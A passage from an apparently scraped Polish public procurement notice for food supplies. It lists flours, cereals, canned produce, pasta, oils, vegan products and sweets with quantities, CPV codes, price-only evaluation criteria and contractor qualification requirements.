Mąka kokosowa - op max 1 kg	kg	3<br/>17. Mąka kukurydziana - opakowanie 1 kg,typu Melwit lub produkt równoważny	kg	3<br/>18. Mąka orkiszowa - op max 1 kg	kg	5<br/>19. Mąka orzechowa - op max 1 kg	kg	5<br/>20. Mąka żytnia - op max 1 kg	kg	5<br/>21. NAPÓJ KAKAOWY (w proszku lub granulkach) typu NESQUIK - opakowanie max 500 g	kg	10<br/>22. Pieczywo bezglutenowe różne gatunki/np..owsiane,wieloziarniste jasne i ciemne,ciemne z żurawiną i dynią itp./- op 500g max kg	5<br/>23. Pieczywo WASA Light żytnie-opakowanie kartonik o wadze max 300 g	kg	10<br/>24. PŁATKI Gold Flakes z miodem i orzechami - delikatnie opiekane płatki kukurydziane wyprodukowane z najwyższej jakości kukurydzy z dodatkiem miodu. wzbogacone o Witaminy i żelazo.Składniki: kukurydza ( min 60%),opakowanie max 500 g,typu Nestle,Lubella lub produkt równoważny	kg	90<br/>25. PŁATKI Cini Minis-płatki zożowe o smaku cynamonowym. Opakowanie max 0.5 kg,typu Lubella,Nestle lub produkt równoważny	kg	50<br/>26. PŁATKI KUKURYDZIANE śniadaniowe - delikatnie opiekane płatki kukurydziane wyprodukowane z I gatunku kukurydzy. wzbogacone o Witaminy i żelazo.Składniki: kukurydza (min 55 %), typu Nestle, Lubella ub produkt równoważny.opakowanie max 1 kg	kg	85<br/>27. PŁATKI KUKURYDZIANE z miodem - delikatnie opiekane płatki kukurydziane wyprodukowane z I gatunku kukurydzy z dodatkiem miodu. wzbogacone o Witaminy i żelazo. Składniki: kukurydza ( min 55%),opakowanie max 1kg,typu Nestle ,lub produkt równoważny	kg	30<br/>28. PŁATKI MUSLI - mieszanka płatków zbożowych, bakalii, orzechów i suszonych owoców, różne rodzaje, opakowanie max 500 g,typu BIFOOD lub produkt równoważny	kg	55<br/>29. PŁATKI OWSIANE Górskie - opakowanie max 0.50 kg typu Kupiec,Melvit lub produkt równoważny	kg	200<br/>30. Płatki pszenne pelnoziarniste /mąka pszenna pełnoziarnista,mąka pszenna,cukier,syrop glukozowy, LION z dodatkiem pasty karmelowej i czekolady -opakowanie max 500 g firmy Nestle lub produkt równoważny	kg	100<br/>31. PŁATKI zbożowe czekoladowe - zbożowe kuleczki o smaku czekoladowym, opakowanie max 500g-typu Nestle,Lubella lub produkt równoważny	kg	35<br/>32. Proszek do pieczenia, opakowanie max 50 g	kg	5<br/>33. Ryż biały zwykły - gatunek I, opakowanie max 1 kg	kg	20<br/>34. RYŻ BRĄZOWY - typu KUPIEC lub produkt Równoważnywaga netto produktu w opak max 1 kg	kg	120<br/>35. RYŻ DŁUGOZIARNISTY paraboiled - preparowany tremicznie, ugotowany na sypko powinien zachowywac swoje wlasciwości podczas przetrzymywania go w grzanych bufetch, po ugotowaniu nie klei i pozostaje sypki nawet po wielokrotnym podgrzewaniu, ziarno ryżu nie rozpadała się, nie rozdwaja, ma jednolity kształt, kolor jasnożółty, podczas bemarowania w przeciągu min. 3 godz. nie zmienia swoich właściwości (nie rozkleja sie) opak max 5 kg np.firmy Kupiec lub produkt równoważny	kg	600<br/>36. Siemię lniane mielone - opakowanie max 0.5 kg	kg	3<br/>37. SKROBIA ZIEMNIACZANA - gatunek I, opakowanie a&#39; 1kg	kg	20<br/>38. Stewia - op max 1 kg,typu LOOK FOOD lub produkt równoważny	kg	10<br/>39. Wafle ryżowe (różne smaki) - op max 250 g,typu Sonko lub produkt równoważny.	kg	5 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15831000-2 - Cukier</p> <p class="mb-0">15614100-6 - Ryż długoziarnisty</p> <p class="mb-0">15613311-1 - Płatki kukurydziane</p> <p class="mb-0">15613313-5 - Muesli lub produkty równoważne</p> <p class="mb-0">15613380-5 - Płatki owsiane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III - warzywa i owoce w zalewach<br/>Lp.	Nazwa oraz opis wymaganych cech danego asortymentu (kryteria stosowane w celu oceny równoważności)	jm	ilość<br/>1.	2.	3.	4.<br/>1. Ananas kostka - gatunek I,w lekkim syropie-puszka metalowa,waga surowca netto w opakowaniu jednostkowym (bez odcieku) max do 3 kg-należy podać cenę netto za 1 kg surowca po odcieku,typu Kier lub produkt równoważny	kg	200<br/>2. ANANASY PLASTRY- w lekkim syropie gatunek I- waga surowca netto w opakowaniu jednostkowym (bez odcieku) max 3kg-należy podać cenę netto surowca za 1 kg po odcieku,typu KIER lub produkt równoważny	kg	60<br/>3. BRZOSKWINIE POŁÓWKI - w lekkim syropie - gatunek I opakowanie puszka metalowa , waga surowca netto w opakowaniu jednostkowym (bez odcieku) max 3kg -należy podać cenę netto surowca za 1 kg po odcieku,typu KIER lub produkt równoważny	kg	70<br/>4. Cieciorka w zalewie-opakowanie słoik lub puszka typu Rolnik,Bonduelle lub produkt równoważny.należy podać cenę netto w odniesieniu do 1 kg samego surowca-po odcieku	kg	5<br/>5. FASOLA CZERWONA - gatunek I, puszka metalowa, waga surowca netto w opakowaniu jednostkowym (bez odcieku) max 1,5kg -należy podać cenę netto surowca za 1 kg po odcieku,typu Bonduella,Pudliszki lub produkt równoważny	kg	90<br/>6. GROSZEK KONSERWOWY gatunek I - puszka metalowa, waga surowca netto w opakowaniu jednostkowym (bez odcieku) max 1kg -należy podać cene netto surowca za 1 kg po odcieku,typu Dawtona lub produkt równoważny	kg	35<br/>7. GRUSZKI POŁÓWKI w syropie - gatunek I,opakowanie puszka metalowa,waga surowca netto w opakowaniu jednostkowym (bez odcieku) max 3kg-należy podać cenę netto surowca za 1 kg po odcieku,typu KIER lub produkt równoważny	kg	50<br/>8. Karczochy serca - gatunek I, waga surowca netto w opakowaniu jednostkowym (bez odcieku) opakowanie puszka 400gr - 2,5 kg max-należy podać cenę surowca netto za 1 kg po odcieku,typu KIER lub produkt równoważny	kg	5<br/>9. KIELKI FASOLI MUNG - gatunek I,opakowanie puszka metalowawaga surowca netto w opakowaniu jednostkowym (bez odcieku) max 500 g-należy podać cenę netto surowca za 1 kg po odcieku,typu KIER lub produkt równoważny	kg	25<br/>10. KOKTAJL OWOCOWY W SYROPIE- skład: (brzoskwinie, gruszka, ananasy, winogrona, papaja), gatunek I, opakowanie puszka metalowa,,. waga surowca netto w opakowaniu jednostkowym (bez odcieku) max 3kg -należy podać cenę netto surowca za 1 kg po odcieku,typu DRIPOL,HELCOM lub produkt równoważny	kg	35<br/>11. KUKURYDZA KONSERWOWA gatunek I, opakowanie puszka metalowa, waga surowca netto w opakowaniu jednostkowym (bez odcieku) max 3kg-należy podać cenę netto surowca za 1 kg po odcieku,typu Jamar,Dawtona,Bonduella lub produkt równoważny	kg	220<br/>12. Marchew z groszkiem-produkt składa się z dwóch warstw warzyw :groszku oraz marchewki pokrojonej w kostkę,w zalewie opalizującej z osadem tkanki roślinnej na dnie opakowania.Barwa groszku zielono-oliwkowa,marchewki ciemno-pomarańczowy .smak i zapach kekko słonawy.bez obcych posmaków i zapachów-opakowanie słoik waga max 0,5 kg-należy podać cenę w odniesieniu do 1 kg samego surowca po odcieku,typu rolnik,Kwidzyń,Dawtona,Pudliszki lub produkt równoważny	kg	20<br/>13. OGÓRKI kartuskie - całe ogórki,z dodatkiem papryki czerwonej,gorczycy, w słodko-kwaśnej zalewie - waga surowca netto w opakowaniu jednostkowym (bez odcieku) w szklanym opakowaniu max do 900 g-należy podać cenę netto surowca za 1 kg po odcieku typu Dagoma, lub produkt równoważny, termin przydatności co najmniej 4 miesiące od dnia dostarczenia do magazynu Zamawiającego	kg	100<br/>14. OGÓRKI KANAPKOWE - gatunek I,opakowanie słoik szklany,waga surowca netto w opakowaniu jednostkowym (bez odcieku) max 500 g, typu Rolnik,FRUTICO -należy podać cenę netto surowca za 1 kg po odcieku,typu Rolnik lub produkt równoważny	kg	45<br/>15. Ogórki konserwowe w zalewie musztardowej-produkt pasteryzowany,skład - ogórki min. 48%, ocet spirytusowy,musztarda,mieszanka warzyw,gorczyca,przyprawy, masa surowca w opakowaniu jednostkowym po odcieku min. 300 g, opakowanie max 1 kg/należy podać cenę surowca netto za 1 kg po odcieku,firmy PROVITUS lub produkt równoważny	kg	45<br/>16. OLIWKI Czarne cięte - opakowanie puszka, waga surowca netto w opakowaniu jednostkowym (bez odcieku) max do1,50 kg-należy podać cenę surowca netto za 1 kg po odcieku,typu KIER,Helcom lub produkt rowoważny	kg	50<br/>17. OLIWKI ZIELONE cięte - opakowanie puszka, waga surowca netto w opakowaniu jednostkowym (bez odcieku) max do1,50kg-należy podać cenę surowca netto za 1 kg po odcieku,typu KIER,Helcom lub produkt równoważny	kg	50<br/>18. Papryka konserwowa czerwona paski - gatunek I, waga surowca netto w opakowaniu jednostkowym (bez odcieku) max 2500 g-należy podać cenę surowca netto za 1 kg po odcieku typu Kier lub produkt równoważny	kg	25<br/>19. Pędy bambusa - opakowanie szklane, waga surowca netto w opakowaniu jednostkowym (bez odcieku) max 500 gr-należy podać cenę netto surowca za 1 kg po odcieku,typu KIER lub produkt równoważny	kg	12<br/>20. PIECZARKA MARYNOWANA CAŁA - gatunek I, waga surowca netto w opakowaniu jednostkowym (bez odcieku) w szklanym opakowaniu max do 800gr-należy podać cenę surowca netto za 1 kg po odcieku typu Rolnik,Bonduelle lub produkt równoważny	kg	35<br/>21. Pomidory suszone w oliwie - opakowanie szklane, waga surowca netto w opakowaniu jednostkowym (bez odcieku) max 1 kg-należy podać cenę netto surowca za 1 kg po odcieku,typu Sottile Gusto lub produkt równoważny	kg	35<br/>22. SELER WIÓRKI - opakowanie słoik szklany,waga surowca netto w opakowaniu jednostkowym (bez odcieku) max 1 kg typu Rolnik -należy podać cenę netto surowca za 1 kg po odcieku typu Rolnik.KIER lub produkt równoważny	kg	8<br/>23. TUŃCZYK W SOSIE WŁASNYM ( kawałki ) - Gatunek I, opakowanie puszka, waga surowca netto w opakowaniu jednostkowym (bez odcieku) waga netto produktu w opak max.500 gr -należy podać cenę surowca netto za 1 kg po odcieku kg	5 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część IV - Makarony i tłuszcze oraz produkty wegańskie<br/>Lp.	Nazwa oraz opis wymaganych cech danego asortymentu (kryteria stosowane w celu oceny równoważności)	jm	ilość<br/>1.	2.	3.	4.<br/>1. Ciecierzyca /sucha/- opakowanie max 0.50 kg	kg	5<br/>2. Kotlety schabowe sojowe - opakowanie max 0,.5 kg	kg	3<br/>3. Kotlety wegańskie/sojowe,warzywne,tofu/ opakowanie max 300 gr.zamykane hermetycznie	kg	5<br/>4. MAKARON - Łazanki- 100% semoliny z twardej pszenicy DURUM, suchy makaron ma zwartą strukturę i bursztynowy kolor - makaron ugotowany al dente powinien zachowywac swoje wlasciwości podczas przetrzymywania go w grzanych bufetch.Powinien być sprężysty, nie kleić się po ugotowaniu, bez pstrocin, podczas bemarowania w przeciągu min. 3 godz. nie zmienia swoich właściwości (nie rozpada sie). Po ugotowaniu nie powinien miec jasnoszarej barwy, nie powinien byc miekki, lepki, rozpadający się, opakowanie max 3 kg lub produkt równoważny	kg	35<br/>5. Makaron Pene - (rurki) -100% semoliny z twardej pszenicy DURUM, suchy makaron ma zwartą strukturę i bursztynowy kolor - makaron ugotowany al dente powinien zachowywac swoje wlasciwości podczas przetrzymywania go w grzanych bufetch.Powinien być sprężysty, nie kleić się po ugotowaniu, bez pstrocin,podczas bemarowania w przeciągu min. 3 godz. nie zmienia swoich właściwości (nie rozpada sie). Po ugotowaniu nie powinien miec jasnoszarej barwy, nie powinien byc miekki, lepki, rozpadający się opakowanie max 3 kg typu Knorr, Lubella, Malma, lub produkt równoważny.	kg	360<br/>6. Makaron Bezglutenowy- różne rodzaje,opakowanie max 1 kg /świderek,kolanko,spaghetti/	kg	4<br/>7. Makaron brązowy 100% semolinyz pszenicą DURUM,suchy makaron posiadający zwartą strukturę i bursztynowy kolor.Makaron ugotowany al. Dente powinien zachować swoje właściwośco podczas przetrzymania go w grzanych bufetach,podgrzewaczach,sprężysty,nie klejący się po ugotowaniu,w trakcie bemarowania w przeciągu 3 godzin znie zmieniający swoich właściwości,nie rozpadający się ,opakowanie max 2 kg typu Lubella,Malma lub produkt równoważny	kg	140<br/>8. MAKARON -kolanka z falbanką - 100% semoliny z twardej pszenicy DURUM, suchy makaron ma zwartą strukturę i bursztynowy kolor - makaron ugotowany al dente powinien zachowywac swoje wlasciwości podczas przetrzymywania go w grzanych bufetch.Powinien być sprężysty, nie kleić się po ugotowaniu, bez pstrocin, podczas bemarowania w przeciągu min. 3 godz. nie zmienia swoich właściwości (nie rozpada sie). Po ugotowaniu nie powinien miec jasnoszarej barwy, nie powinien byc miekki, lepki, rozpadający się, opakowanie max 3 kg typu Knorr, Lubella, Malma, Primo Gusto lub produkt równowazny	kg	30<br/>9. MAKARON -muszelka - 100% semoliny z twardej pszenicy DURUM, suchy makaron ma zwartą strukturę i bursztynowy kolor - makaron ugotowany al dente powinien zachowywac swoje wlasciwości podczas przetrzymywania go w grzanych bufetch.Powinien być sprężysty, nie kleić się po ugotowaniu, bez pstrocin, podczas bemarowania w przeciągu min. 3 godz. nie zmienia swoich właściwości (nie rozpada sie). Po ugotowaniu nie powinien miec jasnoszarej barwy, nie powinien byc miekki, lepki, rozpadający się opakowanie max 3 kg typu KNOR , Lubella, Malma, Primo Gusto lub produkt równoważny	kg	20<br/>10. MAKARON -Nitka cięta - 100% semoliny z twardej pszenicy DURUM, suchy makaron ma zwartą strukturę i bursztynowy kolor - makaron ugotowany al dente powinien zachowywac swoje wlasciwości podczas przetrzymywania go w grzanych bufetch.Powinien być sprężysty, nie kleić się po ugotowaniu, bez pstrocin, podczas bemarowania w przeciągu min. 3 godz. nie zmienia swoich właściwości (nie rozpada sie). Po ugotowaniu nie powinien miec jasnoszarej barwy, nie powinien byc miekki, lepki, rozpadający się, opakowanie max 3 kg typu typu Knorr, Lubella, Malma, Primo Gusto lub produkt równoważny	kg	100<br/>11. Makaron -Świderki 3 kolory - 100% semoliny z twardej pszenicy DURUM, suchy makaron ma zwartą strukturę i bursztynowy kolor - makaron ugotowany al dente powinien zachowywac swoje wlasciwości podczas przetrzymywania go w grzanych bufetch.Powinien być sprężysty, nie kleić się po ugotowaniu, bez pstrocin, podczas bemarowania w przeciągu min. 3 godz. nie zmienia swoich właściwości (nie rozpada sie). Po ugotowaniu nie powinien miec jasnoszarej barwy, nie powinien byc miekki, lepki, rozpadający się, opakowanie max 3 kg typu Knorr, Lubella, Malma, Primo Gusto lub produkt równoważny	kg	100<br/>12. MAKARON -świderki-100% semoliny z twardej pszenicy DURUM, suchy makaron ma zwartą strukturę i bursztynowy kolor - makaron ugotowany al dente powinien zachowywac swoje wlasciwości podczas przetrzymywania go w grzanych bufetch.Powinien być sprężysty, nie kleić się po ugotowaniu, bez pstrocin, podczas bemarowania w przeciągu min. 3 godz. nie zmienia swoich właściwości (nie rozpada sie). Po ugotowaniu nie powinien miec jasnoszarej barwy, nie powinien byc miekki, lepki, rozpadający się, opakowanie max 3 kg typu Knorr, Lubella, Malma, Primo Gusto lub produkt równoważny	kg	240<br/>13. MAKARON typu FARFALLE - (kokardki) -100% semoliny z twardej pszenicy DURUM, suchy makaron ma zwartą strukturę i bursztynowy kolor - makaron ugotowany al dente powinien zachowywac swoje wlasciwości podczas przetrzymywania go w grzanych bufetch.Powinien być sprężysty, nie kleić się po ugotowaniu, bez pstrocin, podczas bemarowania w przeciągu min. 3 godz. nie zmienia swoich właściwości (nie rozpada sie). Po ugotowaniu nie powinien miec jasnoszarej barwy, nie powinien byc miekki, lepki, rozpadający się, opakowanie max 3 kg typu Knorr, Lubella, Malma, Primo Gusto lub produkt równoważny	kg	75<br/>14. MAKARON typu LASAGNE -100% semoliny z pszenicy DURUM - makaron ugotowany al dente powinien zachowywac swoje wlasciwości podczas przetrzymywania go w grzanych bufetch.Powinien być sprężysty, nie kleić się po ugotowaniu, bez pstrocin, podczas bemarowania w przeciągu min. 3 godz. nie zmienia swoich właściwości (nie rozpada sie) opakowanie max 3 kg typu Knorr, Lubella, Malma, Primo Gusto lub produkt równoważny	kg	50<br/>15. MAKARON typu SPAGHETTI -100% semoliny z pszenicy DURUM - makaron ugotowany al dente powinien zachowywac swoje wlasciwości podczas przetrzymywania go w grzanych bufetch.Powinien być sprężysty, nie kleić się po ugotowaniu, bez pstrocin, podczas bemarowania w przeciągu min. 3 godz. nie zmienia swoich właściwości (nie rozpada sie) opakowanie max 3 kg typu Knorr, Lubella, Malma, Primo Gusto lub produkt równoważny	kg	150<br/>16. MAKARON typu TAGLIATELLE - (Gniazdka szeroka wstążka) 100% semoliny z twardej pszenicy DURUM, suchy makaron ma zwartą strukturę i bursztynowy kolor - makaron ugotowany al dente powinien zachowywac swoje wlasciwości podczas przetrzymywania go w grzanych bufetch.Powinien być sprężysty, nie kleić się po ugotowaniu, bez pstrocin, podczas bemarowania w przeciągu min. 3 godz. nie zmienia swoich właściwości (nie rozpada sie). Po ugotowaniu nie powinien miec jasnoszarej barwy, nie powinien byc miekki, lepki, rozpadający się opakowanie max a&#39; 3kg typu typu Knorr, Lubella, Malma, Primo Gusto lub produkt równoważny.	kg	100<br/>17. MAKARON W KSZTAŁCIE RYŻU - 100% semoliny z pszenicy DURUM - makaron ugotowany al dente powinien zachowywac swoje wlasciwości podczas przetrzymywania go w grzanych bufetch. opakowanie max 1 kg np. firmy Primo Gusto,lubella lub produkt równoważny	kg	10<br/>18. Makaron zacierka 100% semoliny z pszenicy DURUM,suchy makaron posiadający zwartą strukturę i bursztynowy kolor.Makaron ugotowany al. Dente powinien zachowywać swoje właściwości podczas przetrzymywania go w grzanych bufetach,podgrzewaczach,sprężysty, nie klejący się po ugotowaniu,w trakcie bemarowania w przeciągu co najmniej 2 godzin,nie zmieniający swoich właściwości ,nie rozpadający się,opakowanie max 1 kg typu Malma,Lubella lub produkt równoważny	kg	50<br/>19. Masło orzechowe kremowe-skład-orzeszki ziemne,olej słonecznikowy,całkowicie uwodniony tłuszcz palmowy,może zawierać również inne orzechy-opakowanie o pojemności max 0.50 kg-firmy Felix-należy podać cenę netto za 1 kg w odniesieniu do wagi surowca wskazanego na opakowaniu	kg	15<br/>20. OLEJ rzepakowy z pierwszego tłoczenia - opakowanie 1- 5l,typu Kujawski,Bielmar Beskidzki lub produkt równoważny	l	1500<br/>21. OLEJ z pestek winogron -dodatek do sałatek,smazenia oraz pieczenia.bezzapachowy podkreśla naturalny smak potraw, Opakowanie max 1 litr ,typu Helcom lub produkt równoważny	l	110<br/>22. Olej arachdowy - opakowanie 1 l max	l	5<br/>23. Olej kokosowy - op max 500 ml ,termin przydatności co najmniej 2 miesiące od daty dostarczenia do magazynu Zamawiającego	litr	3<br/>24. Olej Lniany - opakowanie max 1 l,	l	5<br/>25. Olej sezamowy-olej roślinny otrzymywany poprzez tłoczenie na zimno nasion sezamowych,kolor -od jasno-po ciemnożółty do brązowego-opakowanie szklane,max 1000 ml,	l	5<br/>26. Pasta hummus -różne smaki/np.z oliwkami,klasyczny,z papryką suszonymi pomidorami itp./-bez glutenu,pszenicy,laktozy,-produkt wegański,opak,max 200 g	kg	2<br/>27. Steki sojowe - opakowanie max 500-600g kg	3<br/>28. Tortilla pszenna - rozmiar max 32 cm..	kg	90 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15850000-1 - Produkty z ciasta makaronowego</p> <p class="mb-0">15851000-8 - Produkty mączne</p> <p class="mb-0">15851100-9 - Makaron niegotowany</p> <p class="mb-0">15412000-9 - Tłuszcze</p> <p class="mb-0">15411140-5 - Olej kokosowy</p> <p class="mb-0">15411200-4 - Olej spożywczy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część V- słodycze<br/>Lp.	Nazwa oraz opis wymaganych cech danego asortymentu (kryteria stosowane w celu oceny równoważności)	jm	ilość<br/>1.	2.	3.	4.<br/>1. BATON typu MARS- waga min. 51 g,nugatowe nadzienie oblane mleczną czekoladą lub produkt równoważny	szt	80<br/>2. Baton typu Snickers-masa netto min.50 g<br/>Batonik z nugatowym nadzieniem, ze świeżo prażonymi orzeszkami ziemnymi oblanymi karmelem i mleczną czekoladą lub produkt równoważny	szt	160<br/>3. BATON typu TWIX- waga min. 50 g-ciasteczka oblane karmelem i mleczną czekoladą lub produkt równoważny	szt	200<br/>4. Chipsy lays różne smaki/fromage,paprykowe,zielona cebulka,bekon/ opak min.140 g lub produkt równoważny	szt	60<br/>5. Ciastka delicje-kombinacja soczystej galaretki,miękkiego biszkoptu i aksamitenj czekolady różne smaki/pomarańczowy,malinowy,morelowy-opak o wadze min.145 g lub produkt równoważny	szt	40<br/>6. Ciastka Jeżyki różne smaki -waga opak min 135 g lub produkt równoważny	szt	40<br/>7. Ciastka pieguski różne smaki waga min 130 g lub produkt równoważny	szt	40<br/>8. Czekolada gorzka typu Wedel,Goplana waga min 90 g lub produkt równoważny	szt	20<br/>9. czekolada milka różne smaki 100 g lub produkt równoważny	szt	80<br/>10. czekolada nussbiesser 100 g lub produkt równoważny	szt	50<br/>11. Czekolada wedel rozne smaki waga min.90 g lub produkt równoważny	szt	40<br/>12. Orzeszki ziemne typu Orzeszki firmy Feliks-puszka o wadze min.140 g.solone, z miodem lub produkt równoważny	szt	24<br/>13. Paluszki słone typu lajkonik-opak. 70 g lub produkt równoważny	szt	40<br/>14. Wafelek typu KINDER BUENO-wafel pokryty czekoladą ,wypełniony delikatnym mleczno-orzechowym nadzieniem ,waga min 43 g/2 x min,21,5 g/ lub produkt równoważny	szt	90<br/>15. Wafelek typu Knoppers- mleczno-orzechowy waga min. 25 g Firmy Strock lub produkt równoważny	szt.	96<br/>16. Wafelek typu PRINCE POLO CLASSIC- kruchy wafel z kremem kakaowym oblany czekoladą. Waga min 35g lub produkt równoważny	szt	256<br/>17. Wafle familijne z nadzieniem-różne smaki/śmietankowe,orzechowe.kakaowe,trusk-śmietankowe//-waga opakowania min 175 g lub produkt równoważny	szt	40<br/>18. WAFLE W CZEKOLADZIE typu Princessa Maxi- lekki, puszysty wafelek oblany czekoladą o smakach kokosowa biała, orzechowa, mleczna czekolada. Waga min 44 g lub produkt równoważny	szt	224 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15842300-5 - Wyroby cukiernicze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15842100-3 - Czekolada</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. dostarczane produkty muszą być wysokiej jakości, muszą spełniać wymagania jakościowe, dotyczące przechowywania, pakowania i transportu zawarte w polskich normach przenoszących normy europejskie oraz posiadać ważne terminy przydatności do spożycia, a wykonawca powinien posiadać atesty i/lub pozwolenia potwierdzające, że poprzez odpowiednie odniesienie dokładnie oznaczone produkty będące przedmiotem dostawy odpowiadają wskazanym normom. wymagane jest złożenie odpowiedniego oświadczenia o treści wskazanej w pkt. 8 uzupełniającego formularza oferty (załącznik nr 2 do SWZ), a zamawiający zastrzega sobie prawo do żądania przedstawienia odpowiednich dokumentów potwierdzających powyższe okoliczności i jakość produktów przy danej dostawie<br/>2. oświadczenia o właściwościach oferowanych produktów wymagane w tabeli asortymentowej każdej z części zamówienia w kol. 3 (załącznik nr 2 do SWZ) <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1. oświadczenia o treści wskazanej w pkt. 8 uzupełniającego formularza oferty<br/>2. oświadczenia o właściwościach oferowanych produktów wymagane w tabeli asortymentowej każdej z części zamówienia w kol. 3 <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Inne środki dowodowe (nie wynikające z ustawy Prawo zamówień publicznych) – Zamawiający przed podpisaniem umowy wzywa wykonawcę, którego oferta została wybrana jako najkorzystniejsza, do złożenia w wyznaczonym terminie, aktualnego na dzień złożenia, oświadczenia na potwierdzenie braku podstaw 